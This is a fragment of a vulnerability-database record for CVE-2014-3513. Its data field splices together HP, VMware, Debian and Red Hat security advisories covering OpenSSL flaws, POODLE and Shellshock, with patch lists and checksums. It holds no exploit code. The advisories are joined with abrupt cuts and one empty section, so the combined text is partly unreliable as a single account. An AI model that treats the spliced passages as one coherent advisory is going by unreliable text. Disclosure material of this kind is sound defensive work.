    "data": "Memory leak in d1_srtp.c in the DTLS SRTP extension in OpenSSL 1.0.1 before 1.0.1j allows remote attackers to cause a denial of service (memory consumption) via a crafted handshake message. OpenSSL is prone to a security-bypass vulnerability. \nSuccessfully exploiting this issue will allow attackers to bypass security restrictions and perform unauthorized actions. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\ndocDisplay?docId=emr_na-c04540692\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c04540692\nVersion: 1\n\nHPSBGN03233 rev.1 - HP OneView running OpenSSL, Remote Denial of Service\n(DoS), Unauthorized Access, and Disclosure of Information\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2015-01-13\nLast Updated: 2015-01-13\n\nPotential Security Impact: Remote Denial of Service (DoS), unauthorized\naccess, disclosure of information\n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities have been identified with HP OneView\nrunning OpenSSL and Bash Shell. These vulnerabilities (POODLE and Shellshock)\ncould be exploited remotely to create a Denial of Service (DoS), allow\nunauthorized access, or disclose information. \n\nReferences:\n\nCVE-2014-3513\nCVE-2014-3566\nCVE-2014-3567\nCVE-2014-6271\nCVE-2014-6277\nCVE-2014-6278\nCVE-2014-7169\nCVE-2014-7186\nCVE-2014-7187\nSSRT101739\nSSRT101868\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nHP OneView versions prior to 1.20\n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n  Reference              Base Vector             Base Score\nCVE-2014-3513    (AV:N/AC:M/Au:N/C:N/I:N/A:C)        7.1\nCVE-2014-3566    (AV:N/AC:M/Au:N/C:P/I:N/A:N)        4.3\nCVE-2014-3567    (AV:N/AC:M/Au:N/C:N/I:N/A:C)        7.1\nCVE-2014-6271    (AV:N/AC:L/Au:N/C:C/I:C/A:C)       10.0\nCVE-2014-6277    (AV:N/AC:L/Au:N/C:C/I:C/A:C)       10.0\nCVE-2014-6278    (AV:N/AC:L/Au:N/C:C/I:C/A:C)       10.0\nCVE-2014-7169    (AV:N/AC:L/Au:N/C:C/I:C/A:C)       10.0\nCVE-2014-7186    (AV:N/AC:L/Au:N/C:C/I:C/A:C)       10.0\nCVE-2014-7187    (AV:N/AC:L/Au:N/C:C/I:C/A:C)       10.0\n===========================================================\n             Information on CVSS is documented\n            in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP has released the following software update to resolve the vulnerabilities\nin HP OneView. \n\nExisting users may upgrade to HP OneView version 1.20 using the Update\nAppliance feature in HP OneView. \n\nHP OneView version 1.20 is available from the following location:\n\nhttps://h20392.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumber\n=Z7550-63180\n\nNote: The upgrade (.bin) or a new install (.ova) is also available:\n\nAn HP Passport login is required. \n\nGo to the HP Software Depot site at http://www.software.hp.com and search for\nHP OneView. \n\nHISTORY\nVersion:1 (rev.1) - 13 January 2015 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HP Services support channel.  For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported\nproduct, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\nalerts via Email:\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2015 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. The information provided is provided \"as is\"\nwithout warranty of any kind. To the extent permitted by law, neither HP or\nits affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. \nHewlett-Packard Company and the names of Hewlett-Packard products referenced\nherein are trademarks of Hewlett-Packard Company in the United States and\nother countries. Other product and company names mentioned herein may be\ntrademarks of their respective owners. Summary\n\n   VMware vCenter Server, ESXi, Workstation, Player and Fusion address\n   several security issues. Relevant Releases\n\n   VMware Workstation 10.x prior to version 10.0.5\n  \n   VMware Player 6.x prior to version 6.0.5\n\n   VMware Fusion 7.x prior to version 7.0.1\n   VMware Fusion 6.x prior to version 6.0.5\n\n   vCenter Server 5.5 prior to Update 2d\n\n   ESXi 5.5 without patch ESXi550-201403102-SG, ESXi550-201501101-SG\n   ESXi 5.1 without patch ESXi510-201404101-SG\n   ESXi 5.0 without patch ESXi500-201405101-SG\n\n3. Problem Description \n\n   a. VMware ESXi, Workstation, Player, and Fusion host privilege\n      escalation vulnerability\n\n      VMware ESXi, Workstation, Player and Fusion contain an arbitrary \n      file write issue. Exploitation this issue may allow for privilege\n      escalation on the host. \n\n      The vulnerability does not allow for privilege escalation from \n      the guest Operating System to the host or vice-versa. This means\n      that host memory can not be manipulated from the Guest Operating\n      System. \n\n      Mitigation\n      \n      For ESXi to be affected, permissions must have been added to ESXi\n      (or a vCenter Server managing it) for a virtual machine \n      administrator role or greater. \n\n      VMware would like to thank Shanon Olsson for reporting this issue to\n      us through JPCERT. \n\n      The Common Vulnerabilities and Exposures project (cve.mitre.org)\n      has assigned the identifier CVE-2014-8370 to this issue. \n\n      Column 4 of the following table lists the action required to\n      remediate the vulnerability in each release, if a solution is \n      available. \n\n      VMware         Product    Running   Replace with/\n      Product        Version    on        Apply Patch\n      =============  =======    =======   =================\n      Workstation    11.x       any       not affected\n      Workstation    10.x       any       10.0.5\n\n      Player         7.x        any       not affected\n      Player         6.x        any       6.0.5\n\n      Fusion         7.x        any       not affected\n      Fusion         6.x        any       6.0.5\n\n      ESXi           5.5        ESXi      ESXi550-201403102-SG\n      ESXi           5.1        ESXi      ESXi510-201404101-SG \n      ESXi           5.0        ESXi      ESXi500-201405101-SG\n\n   b. VMware Workstation, Player, and Fusion Denial of Service \n      vulnerability\n\n      VMware Workstation, Player, and Fusion contain an input validation \n      issue in the Host Guest File System (HGFS). This issue may allow\n      for a Denial of Service of the Guest Operating system. \n\n      VMware would like to thank Peter Kamensky from Digital Security for \n      reporting this issue to us. \n\n      The Common Vulnerabilities and Exposures project (cve.mitre.org)\n      has assigned the identifier CVE-2015-1043 to this issue. \n\n      Column 4 of the following table lists the action required to\n      remediate the vulnerability in each release, if a solution is \n      available. \n\n      VMware         Product    Running   Replace with/\n      Product        Version    on        Apply Patch\n      =============  =======    =======   =================\n      Workstation    11.x       any       not affected\n      Workstation    10.x       any       10.0.5\n\n      Player         7.x        any       not affected\n      Player         6.x        any       6.0.5\n\n      Fusion         7.x        any       7.0.1\n      Fusion         6.x        any       6.0.5\n\n   c. VMware ESXi, Workstation, and Player Denial of Service \n      vulnerability\n\n      VMware ESXi, Workstation, and Player contain an input\n      validation issue in VMware Authorization process (vmware-authd). \n      This issue may allow for a Denial of Service of the host. On \n      VMware ESXi and on Workstation running on Linux the Denial of\n      Service would be partial. \n\n      VMware would like to thank Dmitry Yudin @ret5et for reporting\n      this issue to us through HP\u0027s Zero Day Initiative. \n\n      The Common Vulnerabilities and Exposures project (cve.mitre.org)\n      has assigned the identifier CVE-2015-1044 to this issue. \n\n      Column 4 of the following table lists the action required to\n      remediate the vulnerability in each release, if a solution is \n      available. \n\n      VMware         Product    Running   Replace with/\n      Product        Version    on        Apply Patch\n      =============  =======    =======   =================\n      Workstation    11.x       any       not affected\n      Workstation    10.x       any       10.0.5\n\n      Player         7.x        any       not affected\n      Player         6.x        any       6.0.5\n\n      Fusion         7.x        any       not affected\n      Fusion         6.x        any       not affected\n\n      ESXi           5.5        ESXi      ESXi550-201501101-SG\n      ESXi           5.1        ESXi      ESXi510-201410101-SG\n      ESXi           5.0        ESXi      not affected\n\n   d. \n\n      The Common Vulnerabilities and Exposures project (cve.mitre.org)\n      has assigned the names CVE-2014-3513, CVE-2014-3567, \n      CVE-2014-3566 (\"POODLE\") and CVE-2014-3568 to these issues. \n\n      Column 4 of the following table lists the action required to\n      remediate the vulnerability in each release, if a solution is\n      available. \n\n      VMware         Product    Running   Replace with/\n      Product        Version    on        Apply Patch\n      =============  =======    =======   =================\n      vCenter Server 5.5        any       Update 2d*\n      vCenter Server 5.1        any       patch pending\n      vCenter Server 5.0        any       patch pending\n\n      ESXi           5.5        ESXi      ESXi550-201501101-SG       \n      ESXi           5.1        ESXi      patch pending\n      ESXi           5.0        ESXi      patch pending\n\n      * The VMware vCenter 5.5 SSO component will be \n        updated in a later release\n  \n   e. Update to ESXi libxml2 package\n\n      The libxml2 library is updated to version libxml2-2.7.6-17\n      to resolve a security issue. \n\n      The Common Vulnerabilities and Exposures project (cve.mitre.org)\n      has assigned the name CVE-2014-3660 to this issue. \n\n      Column 4 of the following table lists the action required to\n      remediate the vulnerability in each release, if a solution is\n      available. \n\n      VMware         Product    Running   Replace with/\n      Product        Version    on        Apply Patch\n      =============  =======    =======   =================\n      ESXi           5.5        ESXi      ESXi550-201501101-SG     \n      ESXi           5.1        ESXi      patch pending\n      ESXi           5.0        ESXi      patch pending\n     \n4. Solution\n\n   Please review the patch/release notes for your product and \n   version and verify the checksum of your downloaded file. \n\n   VMware Workstation 10.x\n   -------------------------------- \n   https://www.vmware.com/go/downloadworkstation \n\n   VMware Player 6.x\n   --------------------------------     \n   https://www.vmware.com/go/downloadplayer \n\n   VMware Fusion 7.x and 6.x\n   --------------------------------     \n   https://www.vmware.com/go/downloadplayer \n\n   vCenter Server\n   ----------------------------\n   Downloads and Documentation: \n   https://www.vmware.com/go/download-vsphere \n\n   ESXi 5.5 Update 2d\n   ----------------------------\n   File: update-from-esxi5.5-5.5_update01.zip\n   md5sum: 5773844efc7d8e43135de46801d6ea25\n   sha1sum: 6518355d260e81b562c66c5016781db9f077161f\n   http://kb.vmware.com/kb/2065832\n   update-from-esxi5.5-5.5_update01 contains ESXi550-201403102-SG\n\n   ESXi 5.5\n   ----------------------------\n   File: ESXi550-201501001.zip\n   md5sum: b0f2edd9ad17d0bae5a11782aaef9304\n   sha1sum: 9cfcb1e2cf1bb845f0c96c5472d6b3a66f025dd1\n   http://kb.vmware.com/kb/2099265\n   ESXi550-201501001.zip contains ESXi550-201501101-SG\n\n   ESXi 5.1\n   ----------------------------\n   File: ESXi510-201404001.zip\n   md5sum: 9dc3c9538de4451244a2b62d247e52c4\n   sha1sum: 6b1ea36a2711665a670afc9ae37cdd616bb6da66\n   http://kb.vmware.com/kb/2070666\n   ESXi510-201404001 contains ESXi510-201404101-SG\n\n   ESXi 5.0\n   ----------------------------\n   File: ESXi500-201405001.zip\n   md5sum: 7cd1afc97f5f1e4b4132c90835f92e1d\n   sha1sum: 4bd77eeb5d7fc65bbb6f25762b0fa74fbb9679d5\n   http://kb.vmware.com/kb/2075521\n   ESXi500-201405001 contains  ESXi500-201405101-SG\n   \n5. Change log\n\n   2015-01-27 VMSA-2015-0001\n   Initial security advisory in conjunction with the release of VMware\n   Workstation 10.0.5, VMware Player 6.0.5, vCenter Server 5.5 Update 2d\n   and, ESXi 5.5 Patches released on 2015-01-27. Contact\n\n   E-mail list for product security notifications and announcements:\n   http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce\n\n   This Security Advisory is posted to the following lists:\n\n    security-announce at lists.vmware.com\n    bugtraq at securityfocus.com\n    fulldisclosure at seclists.org\n\n   E-mail: security at vmware.com\n   PGP key at: http://kb.vmware.com/kb/1055\n\n   VMware Security Advisories\n   http://www.vmware.com/security/advisories\n\n   Consolidated list of VMware Security Advisories\n   http://kb.vmware.com/kb/2078735\n\n   VMware Security Response Policy\n   https://www.vmware.com/support/policies/security_response.html\n\n   VMware Lifecycle Support Phases\n   https://www.vmware.com/support/policies/lifecycle.html\n \n   Twitter\n   https://twitter.com/VMwareSRC\n\n   Copyright 2015 VMware Inc.  All rights reserved. This flaw allows a man-in-the-middle (MITM)\n    attacker to decrypt a selected byte of a cipher text in as few as 256\n    tries if they are able to force a victim application to repeatedly send\n    the same data over newly created SSL 3.0 connections. \n\n    This update adds support for Fallback SCSV to mitigate this issue. \n\nCVE-2014-3568\n\n    When OpenSSL is configured with \"no-ssl3\" as a build option, servers\n    could accept and complete a SSL 3.0 handshake, and clients could be\n    configured to send them. \n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 1.0.1e-2+deb7u13. \n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1.0.1j-1. \n\nWe recommend that you upgrade your openssl packages. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n                   Red Hat Security Advisory\n\nSynopsis:          Important: openssl security update\nAdvisory ID:       RHSA-2014:1652-01\nProduct:           Red Hat Enterprise Linux\nAdvisory URL:      https://rhn.redhat.com/errata/RHSA-2014-1652.html\nIssue date:        2014-10-16\nCVE Names:         CVE-2014-3513 CVE-2014-3567 \n=====================================================================\n\n1. Summary:\n\nUpdated openssl packages that contain a backported patch to mitigate the\nCVE-2014-3566 issue and fix two security issues are now available for Red\nHat Enterprise Linux 6 and 7. \n\nRed Hat Product Security has rated this update as having Important security\nimpact. Common Vulnerability Scoring System (CVSS) base scores, which give\ndetailed severity ratings, are available for each vulnerability from the\nCVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Desktop (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - x86_64\nRed Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server (v. 7) - ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - ppc64, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\n\n3. Description:\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL),\nTransport Layer Security (TLS), and Datagram Transport Layer Security\n(DTLS) protocols, as well as a full-strength, general purpose cryptography\nlibrary. \n\nThis update adds support for the TLS Fallback Signaling Cipher Suite Value\n(TLS_FALLBACK_SCSV), which can be used to prevent protocol downgrade\nattacks against applications which re-connect using a lower SSL/TLS\nprotocol version when the initial connection indicating the highest\nsupported protocol version fails. \n\nThis can prevent a forceful downgrade of the communication to SSL 3.0. \nThe SSL 3.0 protocol was found to be vulnerable to the padding oracle\nattack when using block cipher suites in cipher block chaining (CBC) mode. \nThis issue is identified as CVE-2014-3566, and also known under the alias\nPOODLE. This SSL 3.0 protocol flaw will not be addressed in a future\nupdate; it is recommended that users configure their applications to\nrequire at least TLS protocol version 1.0 for secure communication. \n\nFor additional information about this flaw, see the Knowledgebase article\nat https://access.redhat.com/articles/1232123\n\nA memory leak flaw was found in the way OpenSSL parsed the DTLS Secure\nReal-time Transport Protocol (SRTP) extension data. (CVE-2014-3513)\n\nA memory leak flaw was found in the way an OpenSSL handled failed session\nticket integrity checks. A remote attacker could exhaust all available\nmemory of an SSL/TLS or DTLS server by sending a large number of invalid\nsession tickets to that server. (CVE-2014-3567)\n\nAll OpenSSL users are advised to upgrade to these updated packages, which\ncontain backported patches to mitigate the CVE-2014-3566 issue and correct\nthe CVE-2014-3513 and CVE-2014-3567 issues. For the update to take effect,\nall services linked to the OpenSSL library (such as httpd and other\nSSL-enabled services) must be restarted or the system rebooted. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nThis update is available via the Red Hat Network. Details on how to use the\nRed Hat Network to apply this update are available at\nhttps://access.redhat.com/articles/11258\n\n5. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 6):\n\nSource:\nopenssl-1.0.1e-30.el6_6.2.src.rpm\n\ni386:\nopenssl-1.0.1e-30.el6_6.2.i686.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.2.i686.rpm\n\nx86_64:\nopenssl-1.0.1e-30.el6_6.2.i686.rpm\nopenssl-1.0.1e-30.el6_6.2.x86_64.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.2.i686.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.2.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop Optional (v. 6):\n\ni386:\nopenssl-debuginfo-1.0.1e-30.el6_6.2.i686.rpm\nopenssl-devel-1.0.1e-30.el6_6.2.i686.rpm\nopenssl-perl-1.0.1e-30.el6_6.2.i686.rpm\nopenssl-static-1.0.1e-30.el6_6.2.i686.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-30.el6_6.2.i686.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.2.x86_64.rpm\nopenssl-devel-1.0.1e-30.el6_6.2.i686.rpm\nopenssl-devel-1.0.1e-30.el6_6.2.x86_64.rpm\nopenssl-perl-1.0.1e-30.el6_6.2.x86_64.rpm\nopenssl-static-1.0.1e-30.el6_6.2.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node (v. 6):\n\nSource:\nopenssl-1.0.1e-30.el6_6.2.src.rpm\n\nx86_64:\nopenssl-1.0.1e-30.el6_6.2.i686.rpm\nopenssl-1.0.1e-30.el6_6.2.x86_64.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.2.i686.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.2.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional (v. 6):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-30.el6_6.2.i686.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.2.x86_64.rpm\nopenssl-devel-1.0.1e-30.el6_6.2.i686.rpm\nopenssl-devel-1.0.1e-30.el6_6.2.x86_64.rpm\nopenssl-perl-1.0.1e-30.el6_6.2.x86_64.rpm\nopenssl-static-1.0.1e-30.el6_6.2.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 6):\n\nSource:\nopenssl-1.0.1e-30.el6_6.2.src.rpm\n\ni386:\nopenssl-1.0.1e-30.el6_6.2.i686.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.2.i686.rpm\nopenssl-devel-1.0.1e-30.el6_6.2.i686.rpm\n\nppc64:\nopenssl-1.0.1e-30.el6_6.2.ppc.rpm\nopenssl-1.0.1e-30.el6_6.2.ppc64.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.2.ppc.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.2.ppc64.rpm\nopenssl-devel-1.0.1e-30.el6_6.2.ppc.rpm\nopenssl-devel-1.0.1e-30.el6_6.2.ppc64.rpm\n\ns390x:\nopenssl-1.0.1e-30.el6_6.2.s390.rpm\nopenssl-1.0.1e-30.el6_6.2.s390x.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.2.s390.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.2.s390x.rpm\nopenssl-devel-1.0.1e-30.el6_6.2.s390.rpm\nopenssl-devel-1.0.1e-30.el6_6.2.s390x.rpm\n\nx86_64:\nopenssl-1.0.1e-30.el6_6.2.i686.rpm\nopenssl-1.0.1e-30.el6_6.2.x86_64.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.2.i686.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.2.x86_64.rpm\nopenssl-devel-1.0.1e-30.el6_6.2.i686.rpm\nopenssl-devel-1.0.1e-30.el6_6.2.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 6):\n\ni386:\nopenssl-debuginfo-1.0.1e-30.el6_6.2.i686.rpm\nopenssl-perl-1.0.1e-30.el6_6.2.i686.rpm\nopenssl-static-1.0.1e-30.el6_6.2.i686.rpm\n\nppc64:\nopenssl-debuginfo-1.0.1e-30.el6_6.2.ppc64.rpm\nopenssl-perl-1.0.1e-30.el6_6.2.ppc64.rpm\nopenssl-static-1.0.1e-30.el6_6.2.ppc64.rpm\n\ns390x:\nopenssl-debuginfo-1.0.1e-30.el6_6.2.s390x.rpm\nopenssl-perl-1.0.1e-30.el6_6.2.s390x.rpm\nopenssl-static-1.0.1e-30.el6_6.2.s390x.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-30.el6_6.2.x86_64.rpm\nopenssl-perl-1.0.1e-30.el6_6.2.x86_64.rpm\nopenssl-static-1.0.1e-30.el6_6.2.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 6):\n\nSource:\nopenssl-1.0.1e-30.el6_6.2.src.rpm\n\ni386:\nopenssl-1.0.1e-30.el6_6.2.i686.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.2.i686.rpm\nopenssl-devel-1.0.1e-30.el6_6.2.i686.rpm\n\nx86_64:\nopenssl-1.0.1e-30.el6_6.2.i686.rpm\nopenssl-1.0.1e-30.el6_6.2.x86_64.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.2.i686.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.2.x86_64.rpm\nopenssl-devel-1.0.1e-30.el6_6.2.i686.rpm\nopenssl-devel-1.0.1e-30.el6_6.2.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 6):\n\ni386:\nopenssl-debuginfo-1.0.1e-30.el6_6.2.i686.rpm\nopenssl-perl-1.0.1e-30.el6_6.2.i686.rpm\nopenssl-static-1.0.1e-30.el6_6.2.i686.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-30.el6_6.2.x86_64.rpm\nopenssl-perl-1.0.1e-30.el6_6.2.x86_64.rpm\nopenssl-static-1.0.1e-30.el6_6.2.x86_64.rpm\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nopenssl-1.0.1e-34.el7_0.6.src.rpm\n\nx86_64:\nopenssl-1.0.1e-34.el7_0.6.x86_64.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.6.i686.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.6.x86_64.rpm\nopenssl-libs-1.0.1e-34.el7_0.6.i686.rpm\nopenssl-libs-1.0.1e-34.el7_0.6.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-34.el7_0.6.i686.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.6.x86_64.rpm\nopenssl-devel-1.0.1e-34.el7_0.6.i686.rpm\nopenssl-devel-1.0.1e-34.el7_0.6.x86_64.rpm\nopenssl-perl-1.0.1e-34.el7_0.6.x86_64.rpm\nopenssl-static-1.0.1e-34.el7_0.6.i686.rpm\nopenssl-static-1.0.1e-34.el7_0.6.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nopenssl-1.0.1e-34.el7_0.6.src.rpm\n\nx86_64:\nopenssl-1.0.1e-34.el7_0.6.x86_64.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.6.i686.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.6.x86_64.rpm\nopenssl-libs-1.0.1e-34.el7_0.6.i686.rpm\nopenssl-libs-1.0.1e-34.el7_0.6.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-34.el7_0.6.i686.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.6.x86_64.rpm\nopenssl-devel-1.0.1e-34.el7_0.6.i686.rpm\nopenssl-devel-1.0.1e-34.el7_0.6.x86_64.rpm\nopenssl-perl-1.0.1e-34.el7_0.6.x86_64.rpm\nopenssl-static-1.0.1e-34.el7_0.6.i686.rpm\nopenssl-static-1.0.1e-34.el7_0.6.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nopenssl-1.0.1e-34.el7_0.6.src.rpm\n\nppc64:\nopenssl-1.0.1e-34.el7_0.6.ppc64.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.6.ppc.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.6.ppc64.rpm\nopenssl-devel-1.0.1e-34.el7_0.6.ppc.rpm\nopenssl-devel-1.0.1e-34.el7_0.6.ppc64.rpm\nopenssl-libs-1.0.1e-34.el7_0.6.ppc.rpm\nopenssl-libs-1.0.1e-34.el7_0.6.ppc64.rpm\n\ns390x:\nopenssl-1.0.1e-34.el7_0.6.s390x.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.6.s390.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.6.s390x.rpm\nopenssl-devel-1.0.1e-34.el7_0.6.s390.rpm\nopenssl-devel-1.0.1e-34.el7_0.6.s390x.rpm\nopenssl-libs-1.0.1e-34.el7_0.6.s390.rpm\nopenssl-libs-1.0.1e-34.el7_0.6.s390x.rpm\n\nx86_64:\nopenssl-1.0.1e-34.el7_0.6.x86_64.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.6.i686.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.6.x86_64.rpm\nopenssl-devel-1.0.1e-34.el7_0.6.i686.rpm\nopenssl-devel-1.0.1e-34.el7_0.6.x86_64.rpm\nopenssl-libs-1.0.1e-34.el7_0.6.i686.rpm\nopenssl-libs-1.0.1e-34.el7_0.6.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nppc64:\nopenssl-debuginfo-1.0.1e-34.el7_0.6.ppc.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.6.ppc64.rpm\nopenssl-perl-1.0.1e-34.el7_0.6.ppc64.rpm\nopenssl-static-1.0.1e-34.el7_0.6.ppc.rpm\nopenssl-static-1.0.1e-34.el7_0.6.ppc64.rpm\n\ns390x:\nopenssl-debuginfo-1.0.1e-34.el7_0.6.s390.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.6.s390x.rpm\nopenssl-perl-1.0.1e-34.el7_0.6.s390x.rpm\nopenssl-static-1.0.1e-34.el7_0.6.s390.rpm\nopenssl-static-1.0.1e-34.el7_0.6.s390x.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-34.el7_0.6.i686.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.6.x86_64.rpm\nopenssl-perl-1.0.1e-34.el7_0.6.x86_64.rpm\nopenssl-static-1.0.1e-34.el7_0.6.i686.rpm\nopenssl-static-1.0.1e-34.el7_0.6.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nopenssl-1.0.1e-34.el7_0.6.src.rpm\n\nx86_64:\nopenssl-1.0.1e-34.el7_0.6.x86_64.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.6.i686.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.6.x86_64.rpm\nopenssl-devel-1.0.1e-34.el7_0.6.i686.rpm\nopenssl-devel-1.0.1e-34.el7_0.6.x86_64.rpm\nopenssl-libs-1.0.1e-34.el7_0.6.i686.rpm\nopenssl-libs-1.0.1e-34.el7_0.6.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-34.el7_0.6.i686.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.6.x86_64.rpm\nopenssl-perl-1.0.1e-34.el7_0.6.x86_64.rpm\nopenssl-static-1.0.1e-34.el7_0.6.i686.rpm\nopenssl-static-1.0.1e-34.el7_0.6.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/#package\n\n7. References:\n\nhttps://www.redhat.com/security/data/cve/CVE-2014-3513.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-3567.html\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://access.redhat.com/articles/1232123\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e.  More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2014 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFUP940XlSAg2UNWIIRAhUYAJ4or1rZ25E0BXjTPyeDsN+keTz3twCdHDEz\nqY686VXQQ02SLq5vTvKfuHk=\n=McEc\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2014-3513"
      },
      {
        "db": "BID",
        "id": "70585"
      },
      {
        "db": "VULMON",
        "id": "CVE-2014-3513"
      },
      {
        "db": "PACKETSTORM",
